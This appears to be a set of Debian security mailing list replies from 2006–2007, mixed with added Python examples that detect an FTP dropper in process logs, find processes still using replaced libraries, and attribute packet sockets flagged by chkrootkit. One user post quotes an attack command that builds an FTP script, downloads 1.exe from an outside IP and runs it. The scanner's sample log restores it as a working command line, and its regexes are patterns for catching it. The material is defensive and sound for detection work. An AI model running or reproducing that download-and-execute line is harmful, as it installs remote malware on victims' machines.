On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis [EMAIL PROTECTED] wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
>
>   %systemroot%\system32\cmd.exe cmd /c echo open 59.31.153.120 22783 ik echo user db database ik echo get 1.exe ik echo bye ik ftp -n -v -s:ik del ik 1.exe exit
>
> (I see on my network monitor that this is coming from outside; the IP number and user name vary.)
>
> After that all is back to normal. Now this is of course a nuisance, but is it also a threat? And what can be done against it? Anybody got a clue on this?
>
> Tia,
> Jan Outhuis

Do you have any kind of VNC servers running? What is your IP address? Can I scan your open ports from it?

- ---
Henri Salo fgeek at fgeek.fi +358407705733
GPG ID: 2EA46E4F fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGQHm1Xf6hBi6kbk8RAvTbAJ0es46vFTz+/6upbt8K3lYYV8HhfwCgs5CC
LK0OvGWT07LV7sZuH+RItUE=
=J58p
-----END PGP SIGNATURE-----
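The typed sequence in Jan's post has a recognisable shape: `echo` lines build an FTP script, `ftp -n -s:` replays it to fetch a binary, and the binary is then run. The scanner below is an added example, not code from the list; it looks for that shape in process-creation log lines and extracts the server, port, script file and fetched file. SAMPLE_LOG is constructed for the example (loosely shaped like Windows 4688 process-creation events); the server address and file name in it are the ones quoted in the post, with the redirection operators that the mail archive stripped put back so the line looks like a real command line.

```python
"""Flag the 'echo an FTP script, replay it with ftp -s:, run the download'
pattern in process command lines. Added example; SAMPLE_LOG is constructed."""
import re

# `echo open <host> [port]` is the first line such a script writes ...
OPEN_RE = re.compile(
    r"echo\s+open\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}|[\w.-]+)(?:\s+(?P<port>\d{1,5}))?",
    re.IGNORECASE)
# ... `echo get <file>` names what is fetched ...
GET_RE = re.compile(r"echo\s+(?:m?get)\s+(?P<file>\S+)", re.IGNORECASE)
# ... and `ftp -s:<script>` (normally with -n to suppress auto-login) replays it.
FTP_SCRIPT_RE = re.compile(r"\bftp\b[^&|;]*?-s:(?P<script>\S+)", re.IGNORECASE)

SAMPLE_LOG = [
    # benign: an interactive ftp session, no script file
    r"4688 NewProcessName=C:\Windows\System32\ftp.exe CommandLine=ftp -v mirror.example.org",
    # the thread's sequence, constructed as it would appear with redirections
    r"4688 NewProcessName=C:\Windows\System32\cmd.exe CommandLine=cmd /c echo open 59.31.153.120 22783 > ik "
    r"& echo user db database >> ik & echo get 1.exe >> ik & echo bye >> ik & ftp -n -v -s:ik & del ik & 1.exe & exit",
    # benign: 'echo open' without any ftp replay
    r"4688 NewProcessName=C:\Windows\System32\cmd.exe CommandLine=cmd /c echo open ticket 42 >> notes.txt",
]


def analyse_cmdline(cmdline):
    """Return a description of the dropper if cmdline matches, else None.

    Both halves are required: an `echo open` alone is someone writing a
    text file, and `ftp -s:` alone is a legitimate scripted transfer."""
    opened = OPEN_RE.search(cmdline)
    replay = FTP_SCRIPT_RE.search(cmdline)
    if not (opened and replay):
        return None
    fetched = [m.group("file") for m in GET_RE.finditer(cmdline)]
    tail = cmdline[replay.end():]  # whatever runs after the transfer
    executed = [f for f in fetched
                if re.search(r"(?<![\w.])" + re.escape(f) + r"\b", tail)]
    return {
        "host": opened.group("host"),
        "port": int(opened.group("port") or 21),  # ftp's default port
        "script": replay.group("script"),
        "fetched": fetched,
        "executed": executed,  # fetched files that are then invoked
    }


def scan_log(lines):
    """[(line_index, analysis)] for every line that matches the pattern."""
    hits = []
    for i, line in enumerate(lines):
        result = analyse_cmdline(line)
        if result:
            hits.append((i, result))
    return hits


if __name__ == "__main__":
    for i, r in scan_log(SAMPLE_LOG):
        print(f"line {i}: fetches {r['fetched']} from {r['host']}:{r['port']} "
              f"via script {r['script']}; runs {r['executed'] or 'nothing'}")
```

The extracted host and port are what you would block at the perimeter and search for in proxy and firewall logs; the "executed" list tells you whether the fetched file was only downloaded or also launched, which decides whether the machine needs rebuilding rather than cleaning.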
Re: Hardened linux (debian) recommendation?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sat, 17 Mar 2007 16:55:11 -0700 virendra rode // [EMAIL PROTECTED] wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> I've already looked at http://www.debian.org/doc/manuals/securing-debian-howto/
> But any further pointers will be appreciated.
>
> regards,
> /virendra
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2.2 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iD8DBQFF/H/fpbZvCIJx1bcRAnTFAJ9Oxdb5/hgQSyiAK/BZds7v25/4kwCgiU7W
> W5eNa1r5DSwcVswrWlB2W+8=
> =RilM
> -----END PGP SIGNATURE-----

You can patch your kernel with http://grsecurity.net/

- ---
Henri Salo [EMAIL PROTECTED] 0407705733
PGP: http://fgeek.fi/pgp/fgeek-fi-key.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF/ICPXf6hBi6kbk8RAqF9AJwKx+sVSn8hWz9/EMCUGlC3V48HJQCgkGQQ
7lOsIwLmUjONtdxLsvzbkBE=
=YIHg
-----END PGP SIGNATURE-----
Re: Firefox on testing hijacked by http://www.megago.com/l/?
Torsten Sadowski wrote:

> Hi,
>
> my Firefox suddenly opens a strange URL as the first page. Could anyone give me a hint how to clean it up?
>
> Cheers,
> Torsten

At least you should try to change your homepage. After that, search for information about megago on the internet, and if you find something about hoaxes or viruses, you can delete and clean it with help. After all, it can be someone from your family, and this isn't an actual Debian-security-related problem.

-- 
Henri Salo | [EMAIL PROTECTED]
Re: When are security updates effective?
Noah Meyerhans wrote:

> On Tue, Aug 29, 2006 at 10:54:45PM +0200, Moritz Muehlenhoff wrote:
> > If there's anything special to do (e.g. kernel or glibc) we already add this to the DSA text.
>
> I don't think that's quite enough. I have a few hundred Debian workstations for which I'm responsible, and it's difficult for me to make sure that the users e.g. restart firefox when we release an update. Daemons automatically get restarted, but desktop apps require intervention. In my case, the desktop apps aren't being run by the people installing the updates (the updates are typically installed either remotely or fully automatically) and that makes things even more difficult.
>
> I haven't come up with a really good solution to this problem. I actually sort of like the Windows method of incessantly nagging the user to reboot their machine (it literally pops up a dialog box every few minutes). I like the idiot-proof factor. Yes, they can ignore the popups, but they come so quickly that even the most stubborn user will get sick of them and reboot. I'd hate it if I was a Windows user, though, I'm sure!
>
> noah

Just write a script that closes all Firefoxes after the update. Haha, that wouldn't be so disturbing.

-- 
Henri Salo | [EMAIL PROTECTED]
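Whether a script closes the application or just nags the user, it first has to know which processes are still running the old code. The script below is an added example, not code from the list or from Debian's tools (the idea is the one checkrestart and needrestart implement). When dpkg installs a new version of a file it renames the new file over the old one; any process that still maps the old file keeps the old inode alive, and /proc/<pid>/maps then shows the path with a "(deleted)" suffix, as does the /proc/<pid>/exe link if the executable itself was replaced. SAMPLE_PROCS is constructed for the example; `--live` walks /proc on the host instead (as root, to see other users' processes).

```python
"""List processes still mapping files that a package upgrade has replaced.
Added example; SAMPLE_PROCS is constructed."""
import os

# Mappings under these paths are unlinked all the time for reasons that have
# nothing to do with package upgrades (temp files, shared memory, memfds).
IGNORED_PREFIXES = ("/dev/", "/tmp/", "/var/tmp/", "/run/", "/memfd:")
DELETED = " (deleted)"

SAMPLE_PROCS = {
    # firefox still maps a libxul.so that the upgrade replaced
    4211: {"comm": "firefox", "exe": "/usr/lib/firefox/firefox-bin", "maps": "\n".join([
        "7f1a00000000-7f1a0000f000 r-xp 00000000 08:01 3942 /usr/lib/firefox/libxul.so (deleted)",
        "7f1a0000f000-7f1a00010000 rw-p 0000e000 08:01 3942 /usr/lib/firefox/libxul.so (deleted)",
        "7f1a00020000-7f1a00030000 r-xp 00000000 08:01 1100 /lib/libc-2.3.6.so",
        "7f1a00100000-7f1a00200000 rw-p 00000000 00:00 0",
        "7f1a00200000-7f1a00201000 rw-s 00000000 00:0e 777 /tmp/scratch.tmp (deleted)",
    ])},
    # sshd: everything it maps is the current on-disk file
    612: {"comm": "sshd", "exe": "/usr/sbin/sshd", "maps": "\n".join([
        "55d0c0000000-55d0c0080000 r-xp 00000000 08:01 2001 /usr/sbin/sshd",
        "7f2b00000000-7f2b00030000 r-xp 00000000 08:01 1100 /lib/libc-2.3.6.so",
    ])},
    # a daemon whose own binary was replaced while its libraries are current
    9001: {"comm": "myservice", "exe": "/usr/local/bin/myservice (deleted)", "maps": "\n".join([
        "7f2b00000000-7f2b00030000 r-xp 00000000 08:01 1100 /lib/libc-2.3.6.so",
    ])},
}


def stale_mappings(maps_text):
    """Paths of replaced files still mapped, from /proc/<pid>/maps text."""
    stale = set()
    for line in maps_text.splitlines():
        parts = line.split(None, 5)  # address perms offset dev inode [path]
        if len(parts) < 6:
            continue  # anonymous mapping: nothing on disk to be stale
        path = parts[5]
        if not path.endswith(DELETED) or not path.startswith("/"):
            continue
        path = path[:-len(DELETED)]
        if path.startswith(IGNORED_PREFIXES):
            continue
        stale.add(path)
    return stale


def processes_needing_restart(procs):
    """{pid: (comm, [stale paths])} for processes whose executable or any
    mapped file has been replaced on disk since they started."""
    result = {}
    for pid, info in procs.items():
        stale = stale_mappings(info["maps"])
        exe = info.get("exe", "")
        if exe.endswith(DELETED):
            stale.add(exe[:-len(DELETED)])
        if stale:
            result[pid] = (info["comm"], sorted(stale))
    return result


def read_live_procs():
    """Collect comm, exe link and maps for every readable process."""
    procs = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            with open(f"/proc/{pid}/maps") as fh:
                maps = fh.read()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:  # process exited, or not ours to inspect
            continue
        procs[int(pid)] = {"comm": comm, "exe": exe, "maps": maps}
    return procs


if __name__ == "__main__":
    import sys
    procs = read_live_procs() if "--live" in sys.argv else SAMPLE_PROCS
    for pid, (comm, paths) in sorted(processes_needing_restart(procs).items()):
        print(f"{pid} {comm}: restart needed, still maps {', '.join(paths)}")
```

Run after `apt-get upgrade`, the output is the list of processes (with owner available from /proc/<pid>/status) that a post-update hook can either terminate or nag about; daemons on that list are the ones whose maintainer scripts did not restart them.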
Re: chkrootkit sniffers
Lothar Ketterer wrote:

> Hi,
>
> It remains strange because normally, lo is a non-broadcast interface. Maybe it would help to know how Henri has his network configured. Mine is configured with ifupdown; /etc/network/interfaces looks like this:
>
>   auto lo eth0
>   iface lo inet loopback
>   iface eth0 inet dhcp
>
> and chkrootkit (version 0.46a) gives me
>
>   eth0: PF_PACKET(/sbin/dhclient, /usr/sbin/arpwatch)
>
> lo is not mentioned.
>
> Regards,
> Lothar

With ifup on an unstable machine:

  auto lo
  iface lo inet loopback
  auto eth0
  iface eth0 inet dhcp

-- 
Henri Salo [EMAIL PROTECTED] 0407705733
chkrootkit sniffers
It is actually saying that in both stable and unstable. I don't have testing versions.
chkrootkit sniffers
I am running Debian stable (kernel 2.6.8-2) and chkrootkit version 0.44. The command chkrootkit gives me:

  Checking `sniffer'... lo: PACKET SNIFFER(/sbin/dhclient[29148])
  eth0: PACKET SNIFFER(/sbin/dhclient[29148], /sbin/dhclient[29307])
  eth1: PACKET SNIFFER(/sbin/dhclient[29148])

Is that serious?

-- 
Henri Salo [EMAIL PROTECTED] 0407705733
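chkrootkit's sniffer test reports that a packet socket exists on an interface; the question this thread (and the follow-up with Lothar's ifupdown configuration above) turns on is who holds it. dhclient holding one is expected, since it has to send and receive DHCP frames before the interface has an address. The script below is an added example, not chkrootkit's code: it reads the /proc/net/packet table, maps each socket inode back to its process through the /proc/<pid>/fd links, and flags any holder that is not on an allow-list. SAMPLE_* inputs are constructed; the dhclient pid is the one quoted in the post, the process named "sniff" and the allow-list are invented for the example, and `--live` gathers the same three inputs from the running kernel.

```python
"""Attribute every PF_PACKET socket to the process holding it and flag
holders that are not expected. Added example; SAMPLE_* data is constructed."""
import os
import re
import socket

SOCK_TYPES = {2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO_NAMES = {0x0003: "ETH_P_ALL", 0x0800: "ETH_P_IP", 0x0806: "ETH_P_ARP"}
# Processes that legitimately hold packet sockets on this box (both names
# appear in the thread's chkrootkit output). Extend for tcpdump etc.
EXPECTED_HOLDERS = {"dhclient", "arpwatch"}

# Constructed /proc/net/packet: columns sk RefCnt Type Proto Iface R Rmem User Inode
SAMPLE_PROC_NET_PACKET = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff88003b8e8000 3      3    0800   2     1 0      0      14217
ffff88003b8e8400 3      3    0800   3     1 0      0      14221
ffff88003c101000 3      3    0003   0     1 0      0      20500
"""
# Constructed pid -> (comm, {fd: readlink target}), as /proc/<pid>/fd gives it.
SAMPLE_FDS = {
    29148: ("dhclient", {"4": "/dev/null", "5": "socket:[14217]", "6": "socket:[14221]"}),
    31337: ("sniff", {"3": "socket:[20500]"}),  # invented unexpected holder
    1: ("init", {"0": "/dev/null"}),
}
SAMPLE_IFNAMES = {1: "lo", 2: "eth0", 3: "eth1"}  # ifindex 0 means 'any'


def parse_proc_net_packet(text):
    """One dict per packet socket; the header line is skipped."""
    socks = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 9 or f[0] == "sk":
            continue
        socks.append({"type": SOCK_TYPES.get(int(f[2]), f[2]), "proto": int(f[3], 16),
                      "ifindex": int(f[4]), "uid": int(f[7]), "inode": int(f[8])})
    return socks


def inode_owners(fds):
    """Invert pid -> fd table into socket inode -> [(pid, comm)]."""
    owners = {}
    for pid, (comm, table) in fds.items():
        for target in table.values():
            m = re.fullmatch(r"socket:\[(\d+)\]", target)
            if m:
                owners.setdefault(int(m.group(1)), []).append((pid, comm))
    return owners


def packet_socket_report(packet_text, fds, ifnames, expected=EXPECTED_HOLDERS):
    """Per socket: interface, protocol, holders, and whether every holder is
    expected. A socket with no visible holder counts as unexpected; on a live
    box that usually means you are not root and cannot read that fd table."""
    owners = inode_owners(fds)
    report = []
    for s in parse_proc_net_packet(packet_text):
        holders = owners.get(s["inode"], [])
        report.append({
            "iface": "any" if s["ifindex"] == 0 else ifnames.get(s["ifindex"], str(s["ifindex"])),
            "proto": PROTO_NAMES.get(s["proto"], f"0x{s['proto']:04x}"),
            "type": s["type"],
            "holders": holders,
            "expected": bool(holders) and all(comm in expected for _, comm in holders),
        })
    return report


def unexpected_sniffers(report):
    return [r for r in report if not r["expected"]]


def read_live():
    """Gather the same three inputs from the running kernel."""
    with open("/proc/net/packet") as fh:
        packet_text = fh.read()
    fds = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            table = {fd: os.readlink(f"/proc/{pid}/fd/{fd}")
                     for fd in os.listdir(f"/proc/{pid}/fd")}
        except OSError:
            continue  # exited mid-walk, or not readable without root
        fds[int(pid)] = (comm, table)
    ifnames = dict(socket.if_nameindex())
    return packet_text, fds, ifnames


if __name__ == "__main__":
    import sys
    inputs = read_live() if "--live" in sys.argv else (
        SAMPLE_PROC_NET_PACKET, SAMPLE_FDS, SAMPLE_IFNAMES)
    for r in packet_socket_report(*inputs):
        who = ", ".join(f"{comm}[{pid}]" for pid, comm in r["holders"]) or "unknown"
        flag = "" if r["expected"] else "  <-- not on the expected list"
        print(f"{r['iface']}: {r['type']} {r['proto']} held by {who}{flag}")
```

The protocol column matters as much as the holder: a SOCK_RAW socket bound to ETH_P_ALL on ifindex 0 sees every frame on every interface, which is what a sniffer wants and what a DHCP client has no use for.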